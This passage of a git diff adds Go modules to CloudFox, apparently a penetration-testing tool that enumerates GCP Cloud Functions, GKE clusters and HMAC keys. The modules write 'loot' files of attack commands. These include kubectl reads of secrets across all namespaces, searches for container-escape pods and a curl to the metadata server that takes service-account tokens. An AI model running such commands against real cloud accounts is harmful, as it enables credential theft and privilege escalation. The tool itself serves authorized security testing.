fn.ServiceAccount, + fn.TriggerURL, + fn.TriggerURL, + ) + } + + // Public functions + if fn.IsPublic { + m.LootMap["functions-public"].Contents += fmt.Sprintf( + "# FUNCTION: %s\n"+ + "# Project: %s, Region: %s\n"+ + "# Invokers: %s\n"+ + "# Service Account: %s\n"+ + "# Ingress: %s\n", + fn.Name, + fn.ProjectID, fn.Region, + strings.Join(fn.InvokerMembers, ", "), + fn.ServiceAccount, + fn.IngressSettings, + ) + if fn.TriggerURL != "" { + m.LootMap["functions-public"].Contents += fmt.Sprintf( + "# URL: %s\n"+ + "curl -s '%s'\n", + fn.TriggerURL, + fn.TriggerURL, + ) + } + m.LootMap["functions-public"].Contents += "\n" + } + + // HTTP endpoints list + if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { + publicMarker := "" + if fn.IsPublic { + publicMarker = " [PUBLIC]" + } + m.LootMap["functions-http-endpoints"].Contents += fmt.Sprintf( + "%s%s\n", + fn.TriggerURL, publicMarker, + ) + } + + // Source code locations + if fn.SourceLocation != "" { + m.LootMap["functions-source-locations"].Contents += fmt.Sprintf( + "# Function: %s (Project: %s, Region: %s)\n"+ + "# Source Type: %s\n"+ + "# Location: %s\n", + fn.Name, fn.ProjectID, fn.Region, + fn.SourceType, fn.SourceLocation, + ) + if fn.SourceType == "GCS" { + m.LootMap["functions-source-locations"].Contents += fmt.Sprintf( + "gsutil cp %s ./function-source-%s.zip\n\n", + fn.SourceLocation, fn.Name, + ) + } else { + m.LootMap["functions-source-locations"].Contents += "\n" + } + } + + // Environment variable names + if len(fn.EnvVarNames) > 0 { + m.LootMap["functions-env-vars"].Contents += fmt.Sprintf( + "## Function: %s (Project: %s)\n", + fn.Name, fn.ProjectID, + ) + for _, varName := range fn.EnvVarNames { + m.LootMap["functions-env-vars"].Contents += fmt.Sprintf("## - %s\n", varName) + } + m.LootMap["functions-env-vars"].Contents += "\n" + } + + // Secret references + if len(fn.SecretEnvVarNames) > 0 || len(fn.SecretVolumeNames) > 0 { + m.LootMap["functions-secrets"].Contents += fmt.Sprintf( + "## Function: %s (Project: %s)\n", + fn.Name, fn.ProjectID, + ) + if len(fn.SecretEnvVarNames) > 0 { + m.LootMap["functions-secrets"].Contents += "## Secret Environment Variables:\n" + for _, secretName := range fn.SecretEnvVarNames { + m.LootMap["functions-secrets"].Contents += fmt.Sprintf("## - %s\n", secretName) + } + } + if len(fn.SecretVolumeNames) > 0 { + m.LootMap["functions-secrets"].Contents += "## Secret Volumes:\n" + for _, volName := range fn.SecretVolumeNames { + m.LootMap["functions-secrets"].Contents += fmt.Sprintf("## - %s\n", volName) + } + } + m.LootMap["functions-secrets"].Contents += "\n" + } +} + +func (m *FunctionsModule) addSecurityAnalysisToLoot(analysis FunctionsService.FunctionSecurityAnalysis, fn FunctionsService.FunctionInfo) { + if analysis.RiskLevel == "CRITICAL" || analysis.RiskLevel == "HIGH" || analysis.RiskLevel == "MEDIUM" { + m.LootMap["functions-security-analysis"].Contents += fmt.Sprintf( + "## [%s] Function: %s\n"+ + "## Project: %s, Region: %s\n"+ + "## Service Account: %s\n"+ + "## Public: %v\n", + analysis.RiskLevel, analysis.FunctionName, + analysis.ProjectID, analysis.Region, + analysis.ServiceAccount, + analysis.IsPublic, + ) + + if len(analysis.RiskReasons) > 0 { + m.LootMap["functions-security-analysis"].Contents += "## Risk Reasons:\n" + for _, reason := range analysis.RiskReasons { + m.LootMap["functions-security-analysis"].Contents += fmt.Sprintf("## - %s\n", reason) + } + } + + if len(analysis.ExploitCommands) > 0 { + m.LootMap["functions-security-analysis"].Contents += "## Exploitation Commands:\n" + for _, cmd := range analysis.ExploitCommands { + m.LootMap["functions-security-analysis"].Contents += cmd + "\n" + } + } + m.LootMap["functions-security-analysis"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main functions table + header := []string{ + "Project ID", + "Name", + "Region", + "State", + "Runtime", + "Trigger", + "Ingress", + "Public", + "Service Account", + "VPC Connector", + "Secrets", + } + + var body [][]string + for _, fn := range m.Functions { + // Format public status + publicStatus := "No" + if fn.IsPublic { + publicStatus = "PUBLIC" + } + + // Format secrets count + secretsInfo := "-" + totalSecrets := fn.SecretEnvVarCount + fn.SecretVolumeCount + if totalSecrets > 0 { + secretsInfo = fmt.Sprintf("%d env, %d vol", fn.SecretEnvVarCount, fn.SecretVolumeCount) + } + + // Format trigger info + triggerInfo := fn.TriggerType + if fn.TriggerEventType != "" { + triggerInfo = fmt.Sprintf("%s (%s)", fn.TriggerType, fn.TriggerEventType) + } + + // Shorten service account for display + saDisplay := fn.ServiceAccount + if strings.Contains(saDisplay, "@") { + parts := strings.Split(saDisplay, "@") + if len(parts) > 0 { + saDisplay = parts[0] + "@..." + } + } + + body = append(body, []string{ + fn.ProjectID, + fn.Name, + fn.Region, + fn.State, + fn.Runtime, + triggerInfo, + fn.IngressSettings, + publicStatus, + saDisplay, + fn.VPCConnector, + secretsInfo, + }) + } + + // HTTP endpoints table + httpHeader := []string{ + "Function", + "Project ID", + "URL", + "Ingress", + "Public", + "Service Account", + } + + var httpBody [][]string + for _, fn := range m.Functions { + if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { + publicStatus := "No" + if fn.IsPublic { + publicStatus = "PUBLIC" + } + httpBody = append(httpBody, []string{ + fn.Name, + fn.ProjectID, + fn.TriggerURL, + fn.IngressSettings, + publicStatus, + fn.ServiceAccount, + }) + } + } + + // Public functions table + publicHeader := []string{ + "Function", + "Project ID", + "Region", + "URL", + "Invokers", + "Service Account", + } + + var publicBody [][]string + for _, fn := range m.Functions { + if fn.IsPublic { + publicBody = append(publicBody, []string{ + fn.Name, + fn.ProjectID, + fn.Region, + fn.TriggerURL, + strings.Join(fn.InvokerMembers, ", "), + fn.ServiceAccount, + }) + } + } + + // Security analysis table (pentest-focused) + securityHeader := []string{ + "Risk", + "Function", + "Project", + "Region", + "Public", + "Service Account", + "Reasons", + } + + var securityBody [][]string + criticalCount := 0 + highCount := 0 + for _, analysis := range m.SecurityAnalysis { + if analysis.RiskLevel == "CRITICAL" { + criticalCount++ + } else if analysis.RiskLevel == "HIGH" { + highCount++ + } + + publicStatus := "No" + if analysis.IsPublic { + publicStatus = "Yes" + } + + reasons := strings.Join(analysis.RiskReasons, "; ") + if len(reasons) > 60 { + reasons = reasons[:60] + "..." + } + + securityBody = append(securityBody, []string{ + analysis.RiskLevel, + analysis.FunctionName, + analysis.ProjectID, + analysis.Region, + publicStatus, + analysis.ServiceAccount, + reasons, + }) + } + + // Source code locations table + sourceHeader := []string{ + "Function", + "Project", + "Source Type", + "Source Location", + } + + var sourceBody [][]string + for _, fn := range m.Functions { + if fn.SourceLocation != "" { + sourceBody = append(sourceBody, []string{ + fn.Name, + fn.ProjectID, + fn.SourceType, + fn.SourceLocation, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_FUNCTIONS_MODULE_NAME, + Header: header, + Body: body, + }, + } + + if len(httpBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "functions-http", + Header: httpHeader, + Body: httpBody, + }) + } + + if len(publicBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "functions-public", + Header: publicHeader, + Body: publicBody, + }) + } + + // Add security analysis table + if len(securityBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "functions-security", + Header: securityHeader, + Body: securityBody, + }) + if criticalCount > 0 || highCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL, %d HIGH risk function(s)!", criticalCount, highCount), globals.GCP_FUNCTIONS_MODULE_NAME) + } + } + + // Add source locations table + if len(sourceBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "functions-source", + Header: sourceHeader, + Body: sourceBody, + }) + } + + output := FunctionsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_FUNCTIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go new file mode 100644 index 00000000..12f6d41f --- /dev/null +++ b/gcp/commands/gke.go @@ -0,0 +1,584 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPGKECommand = &cobra.Command{ + Use: globals.GCP_GKE_MODULE_NAME, + Aliases: []string{"kubernetes", "k8s", "clusters"}, + Short: "Enumerate GKE clusters with security analysis", + Long: `Enumerate GKE clusters across projects with comprehensive security analysis. + +Features: +- Lists all GKE clusters accessible to the authenticated user +- Analyzes security configuration (private clusters, authorized networks, RBAC) +- Identifies clusters with public API endpoints +- Shows workload identity configuration +- Detects common misconfigurations (legacy ABAC, basic auth, no network policy) +- Enumerates node pools with service accounts and OAuth scopes +- Generates kubectl and gcloud commands for further analysis + +Security Columns: +- Private: Whether the cluster uses private nodes (no public IPs) +- MasterAuth: Master authorized networks enabled +- NetworkPolicy: Kubernetes network policy controller enabled +- WorkloadIdentity: GKE Workload Identity configured +- ShieldedNodes: Shielded GKE nodes enabled +- Issues: Detected security misconfigurations + +Attack Surface: +- Public API servers are accessible from the internet +- Clusters without Workload Identity use node service accounts +- Default service accounts may have excessive permissions +- Legacy ABAC allows broader access than RBAC`, + Run: runGCPGKECommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type GKEModule struct { + gcpinternal.BaseGCPModule + + Clusters []GKEService.ClusterInfo + NodePools []GKEService.NodePoolInfo + SecurityAnalyses []GKEService.ClusterSecurityAnalysis + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type GKEOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o GKEOutput) TableFiles() []internal.TableFile { return o.Table } +func (o GKEOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPGKECommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_GKE_MODULE_NAME) + if err != nil { + return + } + + module := &GKEModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Clusters: []GKEService.ClusterInfo{}, + NodePools: []GKEService.NodePoolInfo{}, + SecurityAnalyses: []GKEService.ClusterSecurityAnalysis{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *GKEModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_GKE_MODULE_NAME, m.processProject) + + if len(m.Clusters) == 0 { + logger.InfoM("No GKE clusters found", globals.GCP_GKE_MODULE_NAME) + return + } + + // Count clusters with issues + issueCount := 0 + publicCount := 0 + for _, cluster := range m.Clusters { + if len(cluster.SecurityIssues) > 0 { + issueCount++ + } + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d cluster(s), %d with public API endpoint", len(m.Clusters), publicCount), globals.GCP_GKE_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d cluster(s)", len(m.Clusters)), globals.GCP_GKE_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *GKEModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating GKE clusters in project: %s", projectID), globals.GCP_GKE_MODULE_NAME) + } + + gs := GKEService.New() + clusters, nodePools, err := gs.Clusters(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating GKE in project %s: %v", projectID, err), globals.GCP_GKE_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Clusters = append(m.Clusters, clusters...) + m.NodePools = append(m.NodePools, nodePools...) + + for _, cluster := range clusters { + m.addClusterToLoot(cluster) + // Perform security analysis + analysis := gs.AnalyzeClusterSecurity(cluster, nodePools) + m.SecurityAnalyses = append(m.SecurityAnalyses, analysis) + m.addSecurityAnalysisToLoot(analysis) + } + + // Add node pool security info + for _, np := range nodePools { + m.addNodePoolSecurityToLoot(np) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d cluster(s) in project %s", len(clusters), projectID), globals.GCP_GKE_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *GKEModule) initializeLootFiles() { + m.LootMap["gke-gcloud-commands"] = &internal.LootFile{ + Name: "gke-gcloud-commands", + Contents: "# GKE gcloud Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["gke-kubectl-commands"] = &internal.LootFile{ + Name: "gke-kubectl-commands", + Contents: "# GKE kubectl Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["gke-exploitation"] = &internal.LootFile{ + Name: "gke-exploitation", + Contents: "# GKE Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["gke-security-issues"] = &internal.LootFile{ + Name: "gke-security-issues", + Contents: "# GKE Security Issues Detected\n# Generated by CloudFox\n\n", + } + m.LootMap["gke-security-analysis"] = &internal.LootFile{ + Name: "gke-security-analysis", + Contents: "# GKE Security Analysis\n# Generated by CloudFox\n# Detailed risk assessment for GKE clusters\n\n", + } + m.LootMap["gke-exploit-commands"] = &internal.LootFile{ + Name: "gke-exploit-commands", + Contents: "# GKE Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["gke-risky-nodepools"] = &internal.LootFile{ + Name: "gke-risky-nodepools", + Contents: "# GKE Risky Node Pools\n# Generated by CloudFox\n# Node pools with excessive OAuth scopes or default SA\n\n", + } +} + +func (m *GKEModule) addClusterToLoot(cluster GKEService.ClusterInfo) { + // gcloud commands + m.LootMap["gke-gcloud-commands"].Contents += fmt.Sprintf( + "# Cluster: %s (Project: %s, Location: %s)\n"+ + "gcloud container clusters describe %s --location=%s --project=%s\n"+ + "gcloud container clusters get-credentials %s --location=%s --project=%s\n"+ + "gcloud container node-pools list --cluster=%s --location=%s --project=%s\n\n", + cluster.Name, cluster.ProjectID, cluster.Location, + cluster.Name, cluster.Location, cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + cluster.Name, cluster.Location, cluster.ProjectID, + ) + + // kubectl commands (after getting credentials) + m.LootMap["gke-kubectl-commands"].Contents += fmt.Sprintf( + "# Cluster: %s (get credentials first with gcloud command above)\n"+ + "kubectl cluster-info\n"+ + "kubectl get nodes -o wide\n"+ + "kubectl get namespaces\n"+ + "kubectl get serviceaccounts --all-namespaces\n"+ + "kubectl get clusterroles\n"+ + "kubectl get clusterrolebindings\n"+ + "kubectl auth can-i --list\n"+ + "kubectl get secrets --all-namespaces\n"+ + "kubectl get configmaps --all-namespaces\n\n", + cluster.Name, + ) + + // Exploitation commands + m.LootMap["gke-exploitation"].Contents += fmt.Sprintf( + "# Cluster: %s (Project: %s)\n"+ + "# Endpoint: %s\n"+ + "# Service Account: %s\n\n"+ + "# Get credentials:\n"+ + "gcloud container clusters get-credentials %s --location=%s --project=%s\n\n"+ + "# Check your permissions:\n"+ + "kubectl auth can-i --list\n"+ + "kubectl auth can-i create pods\n"+ + "kubectl auth can-i get secrets\n\n"+ + "# List pods with host PID/network (potential container escape):\n"+ + "kubectl get pods -A -o json | jq '.items[] | select(.spec.hostNetwork==true or .spec.hostPID==true) | {namespace: .metadata.namespace, name: .metadata.name, hostNetwork: .spec.hostNetwork, hostPID: .spec.hostPID}'\n\n"+ + "# Find pods with service accounts:\n"+ + "kubectl get pods -A -o json | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name, serviceAccount: .spec.serviceAccountName}'\n\n", + cluster.Name, cluster.ProjectID, + cluster.Endpoint, + cluster.NodeServiceAccount, + cluster.Name, cluster.Location, cluster.ProjectID, + ) + + // Security issues + if len(cluster.SecurityIssues) > 0 { + m.LootMap["gke-security-issues"].Contents += fmt.Sprintf( + "# CLUSTER: %s (Project: %s)\n"+ + "# Location: %s\n"+ + "# Issues:\n", + cluster.Name, cluster.ProjectID, cluster.Location, + ) + for _, issue := range cluster.SecurityIssues { + m.LootMap["gke-security-issues"].Contents += fmt.Sprintf(" - %s\n", issue) + } + m.LootMap["gke-security-issues"].Contents += "\n" + } +} + +func (m *GKEModule) addSecurityAnalysisToLoot(analysis GKEService.ClusterSecurityAnalysis) { + if analysis.RiskLevel == "CRITICAL" || analysis.RiskLevel == "HIGH" { + m.LootMap["gke-security-analysis"].Contents += fmt.Sprintf( + "# [%s] CLUSTER: %s (Project: %s)\n"+ + "# Location: %s\n", + analysis.RiskLevel, analysis.ClusterName, analysis.ProjectID, analysis.Location, + ) + + if len(analysis.RiskReasons) > 0 { + m.LootMap["gke-security-analysis"].Contents += "# Risk Reasons:\n" + for _, reason := range analysis.RiskReasons { + m.LootMap["gke-security-analysis"].Contents += fmt.Sprintf("# - %s\n", reason) + } + } + + if len(analysis.AttackSurface) > 0 { + m.LootMap["gke-security-analysis"].Contents += "# Attack Surface:\n" + for _, surface := range analysis.AttackSurface { + m.LootMap["gke-security-analysis"].Contents += fmt.Sprintf("# - %s\n", surface) + } + } + + if len(analysis.PrivescPaths) > 0 { + m.LootMap["gke-security-analysis"].Contents += "# Privilege Escalation Paths:\n" + for _, path := range analysis.PrivescPaths { + m.LootMap["gke-security-analysis"].Contents += fmt.Sprintf("# - %s\n", path) + } + } + m.LootMap["gke-security-analysis"].Contents += "\n" + } + + // Add exploit commands + if len(analysis.ExploitCommands) > 0 { + m.LootMap["gke-exploit-commands"].Contents += fmt.Sprintf( + "# [%s] CLUSTER: %s (Project: %s)\n", + analysis.RiskLevel, analysis.ClusterName, analysis.ProjectID, + ) + for _, cmd := range analysis.ExploitCommands { + m.LootMap["gke-exploit-commands"].Contents += cmd + "\n" + } + m.LootMap["gke-exploit-commands"].Contents += "\n" + } +} + +func (m *GKEModule) addNodePoolSecurityToLoot(np GKEService.NodePoolInfo) { + // Only add risky node pools + if np.HasCloudPlatformScope || np.ServiceAccount == "default" || + strings.HasSuffix(np.ServiceAccount, "-compute@developer.gserviceaccount.com") { + + m.LootMap["gke-risky-nodepools"].Contents += fmt.Sprintf( + "# Cluster: %s, Node Pool: %s (Project: %s)\n"+ + "# Service Account: %s\n", + np.ClusterName, np.Name, np.ProjectID, np.ServiceAccount, + ) + + if np.HasCloudPlatformScope { + m.LootMap["gke-risky-nodepools"].Contents += "# WARNING: cloud-platform scope - full GCP access!\n" + } + + if len(np.RiskyScopes) > 0 { + m.LootMap["gke-risky-nodepools"].Contents += "# Risky OAuth Scopes:\n" + for _, scope := range np.RiskyScopes { + m.LootMap["gke-risky-nodepools"].Contents += fmt.Sprintf("# - %s\n", scope) + } + } + + // Add metadata access command + m.LootMap["gke-risky-nodepools"].Contents += fmt.Sprintf( + "# From pod on this node pool, access SA token:\n"+ + "curl -s -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token\n\n", + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *GKEModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main clusters table + header := []string{ + "Project ID", + "Name", + "Location", + "Status", + "Version", + "Private", + "MasterAuth", + "NetworkPolicy", + "WorkloadID", + "ShieldedNodes", + "Issues", + } + + var body [][]string + for _, cluster := range m.Clusters { + // Format workload identity + workloadIDStatus := "No" + if cluster.WorkloadIdentity != "" { + workloadIDStatus = "Yes" + } + + // Count issues + issueCount := len(cluster.SecurityIssues) + issueDisplay := "-" + if issueCount > 0 { + issueDisplay = fmt.Sprintf("%d issues", issueCount) + } + + body = append(body, []string{ + cluster.ProjectID, + cluster.Name, + cluster.Location, + cluster.Status, + cluster.CurrentMasterVersion, + boolToYesNo(cluster.PrivateCluster), + boolToYesNo(cluster.MasterAuthorizedOnly), + boolToYesNo(cluster.NetworkPolicy), + workloadIDStatus, + boolToYesNo(cluster.ShieldedNodes), + issueDisplay, + }) + } + + // Security issues table + issuesHeader := []string{ + "Cluster", + "Project ID", + "Location", + "Issue", + } + + var issuesBody [][]string + for _, cluster := range m.Clusters { + for _, issue := range cluster.SecurityIssues { + issuesBody = append(issuesBody, []string{ + cluster.Name, + cluster.ProjectID, + cluster.Location, + issue, + }) + } + } + + // Node pools table + nodePoolHeader := []string{ + "Cluster", + "Node Pool", + "Project ID", + "Machine Type", + "Node Count", + "Service Account", + "Auto Upgrade", + "Secure Boot", + "Preemptible", + } + + var nodePoolBody [][]string + for _, np := range m.NodePools { + saDisplay := np.ServiceAccount + if saDisplay == "default" { + saDisplay = "DEFAULT (INSECURE)" + } else if strings.Contains(saDisplay, "@") { + parts := strings.Split(saDisplay, "@") + saDisplay = parts[0] + "@..." + } + + preemptible := "No" + if np.Preemptible || np.Spot { + preemptible = "Yes" + } + + nodePoolBody = append(nodePoolBody, []string{ + np.ClusterName, + np.Name, + np.ProjectID, + np.MachineType, + fmt.Sprintf("%d", np.NodeCount), + saDisplay, + boolToYesNo(np.AutoUpgrade), + boolToYesNo(np.SecureBoot), + preemptible, + }) + } + + // Security analysis table (pentest-focused) + analysisHeader := []string{ + "Risk", + "Cluster", + "Project", + "Attack Surface", + "Privesc Paths", + } + + var analysisBody [][]string + for _, analysis := range m.SecurityAnalyses { + // Summarize attack surface and privesc paths + attackSummary := "-" + if len(analysis.AttackSurface) > 0 { + attackSummary = fmt.Sprintf("%d vectors", len(analysis.AttackSurface)) + } + + privescSummary := "-" + if len(analysis.PrivescPaths) > 0 { + privescSummary = fmt.Sprintf("%d paths", len(analysis.PrivescPaths)) + } + + analysisBody = append(analysisBody, []string{ + analysis.RiskLevel, + analysis.ClusterName, + analysis.ProjectID, + attackSummary, + privescSummary, + }) + } + + // Risky node pools table + riskyNPHeader := []string{ + "Cluster", + "Node Pool", + "Service Account", + "Cloud Platform Scope", + "Risky Scopes", + "Project", + } + + var riskyNPBody [][]string + for _, np := range m.NodePools { + if np.HasCloudPlatformScope || np.ServiceAccount == "default" || + strings.HasSuffix(np.ServiceAccount, "-compute@developer.gserviceaccount.com") { + + cloudPlatform := "No" + if np.HasCloudPlatformScope { + cloudPlatform = "YES!" + } + + scopeCount := "-" + if len(np.RiskyScopes) > 0 { + scopeCount = fmt.Sprintf("%d risky", len(np.RiskyScopes)) + } + + riskyNPBody = append(riskyNPBody, []string{ + np.ClusterName, + np.Name, + np.ServiceAccount, + cloudPlatform, + scopeCount, + np.ProjectID, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_GKE_MODULE_NAME, + Header: header, + Body: body, + }, + } + + if len(issuesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-security-issues", + Header: issuesHeader, + Body: issuesBody, + }) + } + + if len(nodePoolBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-node-pools", + Header: nodePoolHeader, + Body: nodePoolBody, + }) + } + + if len(analysisBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-security-analysis", + Header: analysisHeader, + Body: analysisBody, + }) + } + + if len(riskyNPBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "gke-risky-nodepools", + Header: riskyNPHeader, + Body: riskyNPBody, + }) + } + + output := GKEOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_GKE_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/hmackeys.go b/gcp/commands/hmackeys.go new file mode 100644 index 00000000..a468a89f --- /dev/null +++ b/gcp/commands/hmackeys.go @@ -0,0 +1,274 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + hmacservice "github.com/BishopFox/cloudfox/gcp/services/hmacService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPHMACKeysCommand = &cobra.Command{ + Use: globals.GCP_HMACKEYS_MODULE_NAME, + Aliases: []string{"hmac", "s3keys", "storage-keys"}, + Short: "Enumerate GCS HMAC keys (S3-compatible access)", + Long: `Enumerate GCS HMAC keys for S3-compatible access. + +HMAC keys provide S3-compatible access to Google Cloud Storage buckets. +These are often overlooked credentials that can persist even after other +access is revoked. + +Features: +- Lists all HMAC keys with service account associations +- Identifies active vs inactive keys +- Detects old keys needing rotation +- Generates S3-compatible access commands for penetration testing`, + Run: runGCPHMACKeysCommand, +} + +type HMACKeysModule struct { + gcpinternal.BaseGCPModule + HMACKeys []hmacservice.HMACKeyInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type HMACKeysOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o HMACKeysOutput) TableFiles() []internal.TableFile { return o.Table } +func (o HMACKeysOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPHMACKeysCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_HMACKEYS_MODULE_NAME) + if err != nil { + return + } + + module := &HMACKeysModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + HMACKeys: []hmacservice.HMACKeyInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *HMACKeysModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_HMACKEYS_MODULE_NAME, m.processProject) + + if len(m.HMACKeys) == 0 { + logger.InfoM("No HMAC keys found", globals.GCP_HMACKEYS_MODULE_NAME) + return + } + + // Count active keys + activeCount := 0 + for _, key := range m.HMACKeys { + if key.IsActive { + activeCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d HMAC key(s) (%d active)", len(m.HMACKeys), activeCount), globals.GCP_HMACKEYS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *HMACKeysModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating HMAC keys in project: %s", projectID), globals.GCP_HMACKEYS_MODULE_NAME) + } + + svc := hmacservice.New() + keys, err := svc.ListHMACKeys(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating HMAC keys in project %s: %v", projectID, err), globals.GCP_HMACKEYS_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.HMACKeys = append(m.HMACKeys, keys...) + for _, key := range keys { + m.addKeyToLoot(key) + } + m.mu.Unlock() +} + +func (m *HMACKeysModule) initializeLootFiles() { + m.LootMap["hmac-active-keys"] = &internal.LootFile{ + Name: "hmac-active-keys", + Contents: "# Active HMAC Keys (S3-compatible access)\n# Generated by CloudFox\n# These can be used with AWS CLI for GCS access\n\n", + } + m.LootMap["hmac-s3-commands"] = &internal.LootFile{ + Name: "hmac-s3-commands", + Contents: "# S3-Compatible Access Commands for GCS\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["hmac-all-access-ids"] = &internal.LootFile{ + Name: "hmac-all-access-ids", + Contents: "", + } +} + +func (m *HMACKeysModule) addKeyToLoot(key hmacservice.HMACKeyInfo) { + // All access IDs + m.LootMap["hmac-all-access-ids"].Contents += key.AccessID + "\n" + + if key.IsActive { + // Active keys loot + m.LootMap["hmac-active-keys"].Contents += fmt.Sprintf( + "# Access ID: %s\n"+ + "# Service Account: %s\n"+ + "# Project: %s\n"+ + "# Created: %s\n"+ + "# Risk: %s\n", + key.AccessID, + key.ServiceAccountEmail, + key.ProjectID, + key.TimeCreated.Format(time.RFC3339), + key.RiskLevel, + ) + if len(key.RiskReasons) > 0 { + m.LootMap["hmac-active-keys"].Contents += "# Risk Reasons:\n" + for _, reason := range key.RiskReasons { + m.LootMap["hmac-active-keys"].Contents += fmt.Sprintf("# - %s\n", reason) + } + } + 